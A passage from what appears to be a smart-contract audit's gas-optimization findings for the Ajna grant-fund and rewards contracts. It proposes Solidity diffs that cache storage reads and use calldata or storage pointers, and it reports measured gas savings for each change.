diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..ceef9f5 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -341,9 +341,9 @@ abstract contract StandardFunding is Funding, IStandardFunding {
/// @inheritdoc IStandardFunding
function executeStandard(
- address[] memory targets_,
- uint256[] memory values_,
- bytes[] memory calldatas_,
+ address[] calldata targets_,
+ uint256[] calldata values_,
+ bytes[] calldata calldatas_,
bytes32 descriptionHash_
) external nonReentrant override returns (uint256 proposalId_) {
proposalId_ = _hashProposal(targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_STANDARD, descriptionHash_)));
@@ -364,8 +364,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
/// @inheritdoc IStandardFunding
function proposeStandard(
- address[] memory targets_,
- uint256[] memory values_,
+ address[] calldata targets_,
+ uint256[] calldata values_,
bytes[] memory calldatas_,
string memory description_
) external override returns (uint256 proposalId_) {
[G-02] State variables can be cached instead of re-reading them from storage
Caching of a state variable replaces each Gwarmaccess (100 gas)
with a much cheaper stack read.
Note: Some view functions are included below since they are called within state mutating functions.
Total Instances: 6
Estimated Gas Saved: 6 * 100 = 600
Cache _fundedExtraordinaryProposals.length
to save 1 SLOAD
File: ajna-grants/src/grants/base/ExtraordinaryFunding.sol
206: function _getMinimumThresholdPercentage() internal view returns (uint256) {
207: // default minimum threshold is 50
208: if (_fundedExtraordinaryProposals.length == 0) { // @audit: 1st sload
209: return 0.5 * 1e18;
210: }
211: // minimum threshold increases according to the number of funded EFM proposals
212: else {
213: return 0.5 * 1e18 + (_fundedExtraordinaryProposals.length * (0.05 * 1e18)); // @audit: 2nd sload
214: }
215: }
diff --git a/src/grants/base/ExtraordinaryFunding.sol b/src/grants/base/ExtraordinaryFunding.sol
index 4a70abb..0acc0a3 100644
--- a/src/grants/base/ExtraordinaryFunding.sol
+++ b/src/grants/base/ExtraordinaryFunding.sol
@@ -205,12 +205,13 @@ abstract contract ExtraordinaryFunding is Funding, IExtraordinaryFunding {
function _getMinimumThresholdPercentage() internal view returns (uint256) {
// default minimum threshold is 50
- if (_fundedExtraordinaryProposals.length == 0) {
+ uint256 length = _fundedExtraordinaryProposals.length;
+ if (length == 0) {
return 0.5 * 1e18;
// minimum threshold increases according to the number of funded EFM proposals
else {
- return 0.5 * 1e18 + (_fundedExtraordinaryProposals.length * (0.05 * 1e18));
+ return 0.5 * 1e18 + (length * (0.05 * 1e18));
Cache return value from _validateCallDatas(targets_, values_, calldatas_)
to save 1 SLOAD
File: ajna-grants/base/StandardFunding.sol
388: newProposal.tokensRequested = _validateCallDatas(targets_, values_, calldatas_); // check proposal parameters are valid and update tokensRequested
389: // revert if proposal requested more tokens than are available in the distribution period
390: if (newProposal.tokensRequested > (currentDistribution.fundsAvailable * 9 / 10)) revert InvalidProposal(); // @audit: unnecessary sload, emit return value from internal call
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..cf158b2 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -385,10 +385,11 @@ abstract contract StandardFunding is Funding, IStandardFunding {
// store new proposal information
newProposal.proposalId = proposalId_;
newProposal.distributionId = currentDistribution.id;
- newProposal.tokensRequested = _validateCallDatas(targets_, values_, calldatas_); // check proposal parameters are valid and update tokensRequested
+ uint128 _tokensRequested = _validateCallDatas(targets_, values_, calldatas_); // check proposal parameters are valid and update tokensRequested
+ newProposal.tokensRequested = _tokensRequested;
// revert if proposal requested more tokens than are available in the distribution period
- if (newProposal.tokensRequested > (currentDistribution.fundsAvailable * 9 / 10)) revert InvalidProposal();
+ if (_tokensRequested > (currentDistribution.fundsAvailable * 9 / 10)) revert InvalidProposal();
emit ProposalCreated(
Cache existingVote.votesUsed
to save 1 SLOAD
File: ajna-grants/base/StandardFunding.sol
641: if (support == 0 && existingVote.votesUsed > 0 || support == 1 && existingVote.votesUsed < 0) { // audit: 1st sload
642: // if the vote is in the opposite direction of a previous vote,
643: // and the proposal is already in the votesCast array, revert can't change direction
644: revert FundingVoteWrongDirection();
645: }
646: else {
647: // update the votes cast for the proposal
648: existingVote.votesUsed += voteParams_.votesUsed; // @audit: 2nd sload
649: }
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..9fc8ca3 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -638,14 +638,15 @@ abstract contract StandardFunding is Funding, IStandardFunding {
FundingVoteParams storage existingVote = votesCast[uint256(voteCastIndex)];
// can't change the direction of a previous vote
- if (support == 0 && existingVote.votesUsed > 0 || support == 1 && existingVote.votesUsed < 0) {
+ int256 _votesUsed = existingVote.votesUsed;
+ if (support == 0 && _votesUsed > 0 || support == 1 && _votesUsed < 0) {
// if the vote is in the opposite direction of a previous vote,
// and the proposal is already in the votesCast array, revert can't change direction
revert FundingVoteWrongDirection();
else {
// update the votes cast for the proposal
- existingVote.votesUsed += voteParams_.votesUsed;
+ existingVote.votesUsed = _votesUsed + voteParams_.votesUsed;
Use already cached distributionId
to save 2 SLOADs
File: ajna-grants/src/grants/base/StandardFunding.sol
703: uint24 distributionId = proposal_.distributionId; // @audit: 1st sload
743: screeningVotesCast[proposal_.distributionId][account_] += votes_; // @audit: 2nd & 3rd sload
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..15e21fb 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -740,7 +740,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
// record voters vote
- screeningVotesCast[proposal_.distributionId][account_] += votes_;
+ screeningVotesCast[distributionId][account_] += votes_;
// emit VoteCast instead of VoteCastWithParams to maintain compatibility with Tally
emit VoteCast(
Cache screeningVotesCast[distributionId][account_]
to save 1 SLOAD
File: ajna-grants/src/grants/base/StandardFunding.sol
706 if (screeningVotesCast[distributionId][account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower(); // @audit: 1st sload
743: screeningVotesCast[proposal_.distributionId][account_] += votes_; // @audit: 2nd sload
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..9ed774a 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -703,7 +703,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
uint24 distributionId = proposal_.distributionId;
// check that the voter has enough voting power to cast the vote
- if (screeningVotesCast[distributionId][account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower();
+ uint256 _screeningVotesCast = screeningVotesCast[distributionId][account_];
+ if (_screeningVotesCast + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower();
uint256[] storage currentTopTenProposals = _topTenProposals[distributionId];
uint256 proposalId = proposal_.proposalId;
@@ -740,7 +741,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
// record voters vote
- screeningVotesCast[proposal_.distributionId][account_] += votes_;
+ screeningVotesCast[proposal_.distributionId][account_] = _screeningVotesCast + votes_;
// emit VoteCast instead of VoteCastWithParams to maintain compatibility with Tally
emit VoteCast(
[G-03] Refactor internal function to avoid unnecessary SLOAD
The internal functions below read storage slots that are previously read in the functions that invoke them. We can refactor the internal functions so we could pass cached storage variables as stack variables and avoid the extra storage reads that would otherwise take place in the internal functions.
Gas Savings for GrantFund.startNewDistributionPeriod
, obtained via protocol’s tests: Avg 159 gas
Max | |
Before | 75597 |
After | 75438 |
File: ajna-grants/src/grants/base/StandardFunding.sol
227: function _setNewDistributionId() private returns (uint24 newId_) {
228: newId_ = _currentDistributionId += 1;
229: }
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..87dd264 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -143,7 +143,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
uint48 endBlock = startBlock + DISTRIBUTION_PERIOD_LENGTH;
// set new value for currentDistributionId
- newDistributionId_ = _setNewDistributionId();
+ newDistributionId_ = _setNewDistributionId(currentDistributionId);
// create QuarterlyDistribution struct
QuarterlyDistribution storage newDistributionPeriod = _distributions[newDistributionId_];
@@ -224,8 +224,9 @@ abstract contract StandardFunding is Funding, IStandardFunding {
* @dev Increments the previous Id nonce by 1.
* @return newId_ The new distribution period Id.
- function _setNewDistributionId() private returns (uint24 newId_) {
- newId_ = _currentDistributionId += 1;
+ function _setNewDistributionId(uint24 _currentId) private returns (uint24 newId_) {
+ newId_ = _currentId + 1;
+ _currentDistributionId = newId_;
[G-04] Using storage instead of memory for structs/arrays saves gas
Using a memory pointer for a storage struct/array will effectively load all the fields of that data type from storage (SLOAD) into memory (MSTORE). Using a storage pointer will allow you to read specific fields from storage as you need them. If you are not going to use all of the fields of your data type then you should use a storage pointer so that you don’t incur extra Gcoldsload (2100 gas)
for fields that you will never use.
Note: These are instances that the automated report missed.
Total Instances: 12
Gas Savings for RewardsManager.claimRewards
, obtained via protocol’s tests: Avg 3726 gas
Max | |
Before | 393064 |
After | 389338 |
File: ajna-core/src/RewardsManager.sol
440: for (uint256 i = 0; i < positionIndexes_.length; ) {
441: bucketIndex = positionIndexes_[i];
442: BucketState memory bucketSnapshot = stakes[tokenId_].snapshot[bucketIndex];
diff --git a/src/RewardsManager.sol b/src/RewardsManager.sol
index 314b476..bec53c1 100644
--- a/src/RewardsManager.sol
+++ b/src/RewardsManager.sol
@@ -439,7 +439,7 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
// iterate through all buckets and calculate epoch rewards for
for (uint256 i = 0; i < positionIndexes_.length; ) {
bucketIndex = positionIndexes_[i];
- BucketState memory bucketSnapshot = stakes[tokenId_].snapshot[bucketIndex];
+ BucketState storage bucketSnapshot = stakes[tokenId_].snapshot[bucketIndex];
uint256 bucketRate;
if (epoch_ != stakingEpoch_) {
Gas Savings for GrantFund.claimDelegateReward
, obtained via protocol’s tests: Avg 926 gas
Max | |
Before | 65340 |
After | 64414 |
File: ajna-grants/src/grants/base/StandardFunding.sol
236: function claimDelegateReward(
237: uint24 distributionId_
238: ) external override returns(uint256 rewardClaimed_) {
239: // Revert if delegatee didn't vote in screening stage
240: if(screeningVotesCast[distributionId_][msg.sender] == 0) revert DelegateRewardInvalid();
242: QuarterlyDistribution memory currentDistribution = _distributions[distributionId_];
244: // Check if Challenge Period is still active
245: if(block.number < _getChallengeStageEndBlock(currentDistribution.endBlock)) revert ChallengePeriodNotEnded();
247: // check rewards haven't already been claimed
248: if(hasClaimedReward[distributionId_][msg.sender]) revert RewardAlreadyClaimed();
250: QuadraticVoter memory voter = _quadraticVoters[distributionId_][msg.sender];
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..6b3cc5e 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -239,7 +239,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
// Revert if delegatee didn't vote in screening stage
if(screeningVotesCast[distributionId_][msg.sender] == 0) revert DelegateRewardInvalid();
- QuarterlyDistribution memory currentDistribution = _distributions[distributionId_];
+ QuarterlyDistribution storage currentDistribution = _distributions[distributionId_];
// Check if Challenge Period is still active
if(block.number < _getChallengeStageEndBlock(currentDistribution.endBlock)) revert ChallengePeriodNotEnded();
@@ -247,7 +247,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
// check rewards haven't already been claimed
if(hasClaimedReward[distributionId_][msg.sender]) revert RewardAlreadyClaimed();
- QuadraticVoter memory voter = _quadraticVoters[distributionId_][msg.sender];
+ QuadraticVoter storage voter = _quadraticVoters[distributionId_][msg.sender];
// calculate rewards earned for voting
rewardClaimed_ = _getDelegateReward(currentDistribution, voter);
@@ -272,9 +272,9 @@ abstract contract StandardFunding is Funding, IStandardFunding {
* @return rewards_ The delegate rewards accrued to the voter.
function _getDelegateReward(
- QuarterlyDistribution memory currentDistribution_,
- QuadraticVoter memory voter_
- ) internal pure returns (uint256 rewards_) {
+ QuarterlyDistribution storage currentDistribution_,
+ QuadraticVoter storage voter_
+ ) internal view returns (uint256 rewards_) {
// calculate the total voting power available to the voter that was allocated in the funding stage
uint256 votingPowerAllocatedByDelegatee = voter_.votingPower - voter_.remainingVotingPower;
@@ -918,8 +918,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
uint24 distributionId_,
address voter_
) external view override returns (uint256 rewards_) {
- QuarterlyDistribution memory currentDistribution = _distributions[distributionId_];
- QuadraticVoter memory voter = _quadraticVoters[distributionId_][voter_];
+ QuarterlyDistribution storage currentDistribution = _distributions[distributionId_];
+ QuadraticVoter storage voter = _quadraticVoters[distributionId_][voter_];
rewards_ = _getDelegateReward(currentDistribution, voter);
Gas Savings for GrantFund.updateSlate
, obtained via protocol’s tests: Avg 2387 gas
Max | |
Before | 318329 |
After | 315942 |
File: ajna-grants/src/grants/base/StandardFunding.sol
434: for (uint i = 0; i < numProposalsInSlate_; ) {
435: Proposal memory proposal = _standardFundingProposals[proposalIds_[i]];
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..115edd4 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -432,7 +432,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
// check each proposal in the slate is valid
for (uint i = 0; i < numProposalsInSlate_; ) {
- Proposal memory proposal = _standardFundingProposals[proposalIds_[i]];
+ Proposal storage proposal = _standardFundingProposals[proposalIds_[i]];
// check if Proposal is in the topTenProposals list
if (_findProposalIndex(proposalIds_[i], _topTenProposals[distributionId_]) == -1) revert InvalidProposalSlate();
Gas Savings for GrantFund.fundingVote
, obtained via protocol’s tests: Avg 2372 gas
Max | |
Before | 409345 |
After | 406973 |
File: ajna-grants/src/grants/base/StandardFunding.sol
763: function _findProposalIndex(
764: uint256 proposalId_,
765: uint256[] memory array_
766: ) internal pure returns (int256 index_) {
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..ea0c1cd 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -762,8 +762,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
function _findProposalIndex(
uint256 proposalId_,
- uint256[] memory array_
- ) internal pure returns (int256 index_) {
+ uint256[] storage array_
+ ) internal view returns (int256 index_) {
index_ = -1; // default value indicating proposalId not in the array
int256 arrayLength = int256(array_.length);
Gas Savings for GrantFund.fundingVote
, obtained via protocol’s tests: Avg 3307 gas
Max | |
Before | 409345 |
After | 406038 |
File: ajna-grants/src/grants/base/StandardFunding.sol
789: function _findProposalIndexOfVotesCast(
790: uint256 proposalId_,
791: FundingVoteParams[] memory voteParams_
792: ) internal pure returns (int256 index_) {
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..64d1163 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -788,8 +788,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
function _findProposalIndexOfVotesCast(
uint256 proposalId_,
- FundingVoteParams[] memory voteParams_
- ) internal pure returns (int256 index_) {
+ FundingVoteParams[] storage voteParams_
+ ) internal view returns (int256 index_) {
index_ = -1; // default value indicating proposalId not in the array
Gas Savings for GrantFund.fundingVote
, obtained via protocol’s tests: Avg 4282 gas
Max | |
Before | 409345 |
After | 405063 |
File: ajna-grants/src/grants/base/StandardFunding.sol
843: function _sumSquareOfVotesCast(
844: FundingVoteParams[] memory votesCast_
845: ) internal pure returns (uint256 votesCastSumSquared_) {
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..b79bec9 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -841,8 +841,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
* @return votesCastSumSquared_ The sum of the square of each vote cast.
function _sumSquareOfVotesCast(
- FundingVoteParams[] memory votesCast_
- ) internal pure returns (uint256 votesCastSumSquared_) {
+ FundingVoteParams[] storage votesCast_
+ ) internal view returns (uint256 votesCastSumSquared_) {
uint256 numVotesCast = votesCast_.length;
for (uint256 i = 0; i < numVotesCast; ) {
[G-05] Avoid emitting storage values
Caching of a state variable replaces each Gwarmaccess (100 gas)
with a much cheaper stack read. We can avoid unecessary SLOADs by caching storage values that were previously accessed and emitting those cached values.
Cache expression and emit cached value instead of reading from storage
File: ajna-grants/src/grants/GrantFund.sol
58: function fundTreasury(uint256 fundingAmount_) external override {
59: IERC20 token = IERC20(ajnaTokenAddress);
60: // update treasury accounting
61: treasury += fundingAmount_;
62: emit FundTreasury(fundingAmount_, treasury); // @audit: emit expression
diff --git a/src/grants/GrantFund.sol b/src/grants/GrantFund.sol
index 3d568b0..fb9f369 100644
--- a/src/grants/GrantFund.sol
+++ b/src/grants/GrantFund.sol
@@ -59,12 +59,14 @@ contract GrantFund is IGrantFund, ExtraordinaryFunding, StandardFunding {
IERC20 token = IERC20(ajnaTokenAddress);
// update treasury accounting
- treasury += fundingAmount_;
+ uint256 _newTreasury = treasury + fundingAmount_;
+ treasury = _newTreasury;
- emit FundTreasury(fundingAmount_, treasury);
+ emit FundTreasury(fundingAmount_, _newTreasury);
// transfer ajna tokens to the treasury
token.safeTransferFrom(msg.sender, address(this), fundingAmount_);
[G-06] Multiple accesses of a mapping/array should use a storage pointer
Caching a mapping’s value in a storage pointer when the value is accessed multiple times saves ~40 gas per access due to not having to perform the same offset calculation every time. Help the Optimizer by saving a storage variable’s reference instead of repeatedly fetching it.
To achieve this, declare a storage pointer for the variable and use it instead of repeatedly fetching the reference in a map or an array. As an example, instead of repeatedly calling stakes[tokenId_]
, save its reference via a storage pointer: StakeInfo storage stakeInfo = stakes[tokenId_]
and use the pointer instead.
Note: These are instances the automated report missed
Total Instances: 14
Gas Savings for RewardsManager.claimRewards
, obtained via protocol’s tests: Avg 290 gas
Max | |
Before | 393064 |
After | 392774 |
Cache storage pointers for stakes[tokenId_]
and isEpochClaimed[tokenId_]
File: ajna-core/src/RewardsManager.sol
389: address ajnaPool = stakes[tokenId_].ajnaPool;
390: uint256 lastClaimedEpoch = stakes[tokenId_].lastClaimedEpoch;
391: uint256 stakingEpoch = stakes[tokenId_].stakingEpoch;
411: rewardsClaimed[epoch] += nextEpochRewards;
412: isEpochClaimed[tokenId_][epoch] = true;
diff --git a/src/RewardsManager.sol b/src/RewardsManager.sol
index 314b476..028e487 100644
--- a/src/RewardsManager.sol
+++ b/src/RewardsManager.sol
@@ -385,14 +385,16 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
uint256 tokenId_,
uint256 epochToClaim_
) internal returns (uint256 rewards_) {
- address ajnaPool = stakes[tokenId_].ajnaPool;
- uint256 lastClaimedEpoch = stakes[tokenId_].lastClaimedEpoch;
- uint256 stakingEpoch = stakes[tokenId_].stakingEpoch;
+ StakeInfo storage stakeInfo = stakes[tokenId_];
+ address ajnaPool = stakeInfo.ajnaPool;
+ uint256 lastClaimedEpoch = stakeInfo.lastClaimedEpoch;
+ uint256 stakingEpoch = stakeInfo.stakingEpoch;
uint256[] memory positionIndexes = positionManager.getPositionIndexesFiltered(tokenId_);
// iterate through all burn periods to calculate and claim rewards
+ mapping(uint256 => bool) storage _isEpochClaimed = isEpochClaimed[tokenId_];
for (uint256 epoch = lastClaimedEpoch; epoch < epochToClaim_; ) {
uint256 nextEpochRewards = _calculateNextEpochRewards(
@@ -409,7 +411,7 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
// update epoch token claim trackers
rewardsClaimed[epoch] += nextEpochRewards;
- isEpochClaimed[tokenId_][epoch] = true;
+ _isEpochClaimed[epoch] = true;
Gas Savings for RewardsManager.moveStakedLiquidity
, obtained via protocol’s tests: Avg 1373 gas
Max | |
Before | 2112272 |
After | 2110899 |
Cache storage pointer for bucketExchangeRates[pool_][bucketIndex_]
File: ajna-core/src/RewardsManager.sol
748: uint256 burnExchangeRate = bucketExchangeRates[pool_][bucketIndex_][burnEpoch_];
750: // update bucket exchange rate at epoch only if it wasn't previously updated
751: if (burnExchangeRate == 0) {
752: uint256 curBucketExchangeRate = IPool(pool_).bucketExchangeRate(bucketIndex_);
754: // record bucket exchange rate at epoch
755: bucketExchangeRates[pool_][bucketIndex_][burnEpoch_] = curBucketExchangeRate;
775: uint256 burnExchangeRate = bucketExchangeRates[pool_][bucketIndex_][burnEpoch_];
777: // update bucket exchange rate at epoch only if it wasn't previously updated
778: if (burnExchangeRate == 0) {
779: uint256 curBucketExchangeRate = IPool(pool_).bucketExchangeRate(bucketIndex_);
781: // record bucket exchange rate at epoch
782: bucketExchangeRates[pool_][bucketIndex_][burnEpoch_] = curBucketExchangeRate;
784: // retrieve the bucket exchange rate at the previous epoch
785: uint256 prevBucketExchangeRate = bucketExchangeRates[pool_][bucketIndex_][burnEpoch_ - 1];
diff --git a/src/RewardsManager.sol b/src/RewardsManager.sol
index 314b476..8e2250e 100644
--- a/src/RewardsManager.sol
+++ b/src/RewardsManager.sol
@@ -745,14 +745,15 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
uint256 bucketIndex_,
uint256 burnEpoch_
) internal {
- uint256 burnExchangeRate = bucketExchangeRates[pool_][bucketIndex_][burnEpoch_];
+ mapping(uint256 => uint256) storage _bucketExchangeRates = bucketExchangeRates[pool_][bucketIndex_];
+ uint256 burnExchangeRate = _bucketExchangeRates[burnEpoch_];
// update bucket exchange rate at epoch only if it wasn't previously updated
if (burnExchangeRate == 0) {
uint256 curBucketExchangeRate = IPool(pool_).bucketExchangeRate(bucketIndex_);
// record bucket exchange rate at epoch
- bucketExchangeRates[pool_][bucketIndex_][burnEpoch_] = curBucketExchangeRate;
+ _bucketExchangeRates[burnEpoch_] = curBucketExchangeRate;
@@ -772,17 +773,18 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
uint256 totalBurned_,
uint256 interestEarned_
) internal returns (uint256 rewards_) {
- uint256 burnExchangeRate = bucketExchangeRates[pool_][bucketIndex_][burnEpoch_];
+ mapping(uint256 => uint256) storage _bucketExchangeRates = bucketExchangeRates[pool_][bucketIndex_];
+ uint256 burnExchangeRate = _bucketExchangeRates[burnEpoch_];
// update bucket exchange rate at epoch only if it wasn't previously updated
if (burnExchangeRate == 0) {
uint256 curBucketExchangeRate = IPool(pool_).bucketExchangeRate(bucketIndex_);
// record bucket exchange rate at epoch
- bucketExchangeRates[pool_][bucketIndex_][burnEpoch_] = curBucketExchangeRate;
+ _bucketExchangeRates[burnEpoch_] = curBucketExchangeRate;
// retrieve the bucket exchange rate at the previous epoch
- uint256 prevBucketExchangeRate = bucketExchangeRates[pool_][bucketIndex_][burnEpoch_ - 1];
+ uint256 prevBucketExchangeRate = _bucketExchangeRates[burnEpoch_ - 1];
// skip reward calculation if update at the previous epoch was missed and if exchange rate decreased due to bad debt
// prevents excess rewards from being provided from using a 0 value as an input to the interestFactor calculation below.
Gas Savings for RewardsManager.claimRewards
, obtained via protocol’s tests: Avg 4795 gas
Max | |
Before | 393064 |
After | 388269 |
Cache storage pointer for bucketExchangeRates[ajnaPool_]
and stakes[tokenId_]
File: ajna-core/src/RewardsManager.sol
442: BucketState memory bucketSnapshot = stakes[tokenId_].snapshot[bucketIndex];
444: uint256 bucketRate;
445: if (epoch_ != stakingEpoch_) {
447: // if staked in a previous epoch then use the initial exchange rate of epoch
448: bucketRate = bucketExchangeRates[ajnaPool_][bucketIndex][epoch_];
diff --git a/src/RewardsManager.sol b/src/RewardsManager.sol
index 314b476..e416c82 100644
--- a/src/RewardsManager.sol
+++ b/src/RewardsManager.sol
@@ -437,15 +437,17 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
uint256 interestEarned;
// iterate through all buckets and calculate epoch rewards for
+ StakeInfo storage _stakeInfo = stakes[tokenId_];
+ mapping(uint256 => mapping(uint256 => uint256)) storage _bucketExchangeRates = bucketExchangeRates[ajnaPool_];
for (uint256 i = 0; i < positionIndexes_.length; ) {
bucketIndex = positionIndexes_[i];
- BucketState memory bucketSnapshot = stakes[tokenId_].snapshot[bucketIndex];
+ BucketState memory bucketSnapshot = _stakeInfo.snapshot[bucketIndex];
uint256 bucketRate;
if (epoch_ != stakingEpoch_) {
// if staked in a previous epoch then use the initial exchange rate of epoch
- bucketRate = bucketExchangeRates[ajnaPool_][bucketIndex][epoch_];
+ bucketRate = _bucketExchangeRates[bucketIndex][epoch_];
} else {
// if staked during the epoch then use the bucket rate at the time of staking
Gas Savings for PositionManager.memorializePositions
, obtained via protocol’s tests: Avg 1043 gas
Max | |
Before | 1134444 |
After | 1133401 |
Cache storage pointer for positions[params_.tokenId]
File: ajna-core/src/PositionManager.sol
190: Position memory position = positions[params_.tokenId][index];
192: // check for previous deposits
193: if (position.depositTime != 0) {
194: // check that bucket didn't go bankrupt after prior memorialization
195: if (_bucketBankruptAfterDeposit(pool, index, position.depositTime)) {
196: // if bucket did go bankrupt, zero out the LP tracked by position manager
197: position.lps = 0;
198: }
199: }
201: // update token position LP
202: position.lps += lpBalance;
203: // set token's position deposit time to the original lender's deposit time
204: position.depositTime = depositTime;
206: // save position in storage
207: positions[params_.tokenId][index] = position;
diff --git a/src/PositionManager.sol b/src/PositionManager.sol
index 261fbc1..08e09a9 100644
--- a/src/PositionManager.sol
+++ b/src/PositionManager.sol
@@ -177,7 +177,8 @@ contract PositionManager is ERC721, PermitERC721, IPositionManager, Multicall, R
uint256 indexesLength = params_.indexes.length;
uint256 index;
+ mapping(uint256 => Position) storage _position = positions[params_.tokenId];
for (uint256 i = 0; i < indexesLength; ) {
index = params_.indexes[i];
@@ -186,8 +187,8 @@ contract PositionManager is ERC721, PermitERC721, IPositionManager, Multicall, R
(uint256 lpBalance, uint256 depositTime) = pool.lenderInfo(index, owner);
- Position memory position = positions[params_.tokenId][index];
+ Position memory position = _position[index];
// check for previous deposits
if (position.depositTime != 0) {
@@ -204,7 +205,7 @@ contract PositionManager is ERC721, PermitERC721, IPositionManager, Multicall, R
position.depositTime = depositTime;
// save position in storage
- positions[params_.tokenId][index] = position;
+ _position[index] = position;
unchecked { ++i; }
Gas Savings for PositionManager.reedemPositions
, obtained via protocol’s tests: Avg 167 gas
Max | |
Before | 139811 |
After | 139644 |
Cache storage pointer for positions[params_.tokenId]
File: ajna-core/src/PositionManager.sol
367: Position memory position = positions[params_.tokenId][index];
369: if (position.depositTime == 0 || position.lps == 0) revert RemovePositionFailed();
371: // check that bucket didn't go bankrupt after memorialization
372: if (_bucketBankruptAfterDeposit(pool, index, position.depositTime)) revert BucketBankrupt();
374: // remove bucket index at which a position has added liquidity
375: if (!positionIndex.remove(index)) revert RemovePositionFailed();
377: lpAmounts[i] = position.lps;
379: // remove LP tracked by position manager at bucket index
380: delete positions[params_.tokenId][index];
diff --git a/src/PositionManager.sol b/src/PositionManager.sol
index 261fbc1..09f3417 100644
--- a/src/PositionManager.sol
+++ b/src/PositionManager.sol
@@ -360,11 +360,12 @@ contract PositionManager is ERC721, PermitERC721, IPositionManager, Multicall, R
uint256[] memory lpAmounts = new uint256[](indexesLength);
uint256 index;
+ mapping(uint256 => Position) storage _position = positions[params_.tokenId];
for (uint256 i = 0; i < indexesLength; ) {
index = params_.indexes[i];
- Position memory position = positions[params_.tokenId][index];
+ Position memory position = _position[index];
if (position.depositTime == 0 || position.lps == 0) revert RemovePositionFailed();
@@ -377,7 +378,7 @@ contract PositionManager is ERC721, PermitERC721, IPositionManager, Multicall, R
lpAmounts[i] = position.lps;
// remove LP tracked by position manager at bucket index
- delete positions[params_.tokenId][index];
+ delete _position[index];
unchecked { ++i; }
Gas Savings for GrantFund.voteExtraordinary
, obtained via protocol’s tests: Avg 67 gas
Max | |
Before | 31424 |
After | 31357 |
Cache storage pointer for hashVotedExtraordinary[proposalId_]
File: ajna-grants/src/grants/base/ExtraordinaryFunding.sol
135: if (hasVotedExtraordinary[proposalId_][msg.sender]) revert AlreadyVoted();
137: ExtraordinaryFundingProposal storage proposal = _extraordinaryFundingProposals[proposalId_];
138: // revert if proposal is inactive
139: if (proposal.startBlock > block.number || proposal.endBlock < block.number || proposal.executed) {
140: revert ExtraordinaryFundingProposalInactive();
141: }
143: // check voting power at snapshot block and update proposal votes
144: votesCast_ = _getVotesExtraordinary(msg.sender, proposalId_);
145: proposal.votesReceived += SafeCast.toUint120(votesCast_);
147: // record that voter has voted on this extraordinary funding proposal
148: hasVotedExtraordinary[proposalId_][msg.sender] = true;
diff --git a/src/grants/base/ExtraordinaryFunding.sol b/src/grants/base/ExtraordinaryFunding.sol
index 4a70abb..e128c97 100644
--- a/src/grants/base/ExtraordinaryFunding.sol
+++ b/src/grants/base/ExtraordinaryFunding.sol
@@ -132,7 +132,8 @@ abstract contract ExtraordinaryFunding is Funding, IExtraordinaryFunding {
uint256 proposalId_
) external override returns (uint256 votesCast_) {
// revert if msg.sender already voted on proposal
- if (hasVotedExtraordinary[proposalId_][msg.sender]) revert AlreadyVoted();
+ mapping(address => bool) storage _hasVoted = hasVotedExtraordinary[proposalId_];
+ if (_hasVoted[msg.sender]) revert AlreadyVoted();
ExtraordinaryFundingProposal storage proposal = _extraordinaryFundingProposals[proposalId_];
// revert if proposal is inactive
@@ -145,7 +146,7 @@ abstract contract ExtraordinaryFunding is Funding, IExtraordinaryFunding {
proposal.votesReceived += SafeCast.toUint120(votesCast_);
// record that voter has voted on this extraordinary funding proposal
- hasVotedExtraordinary[proposalId_][msg.sender] = true;
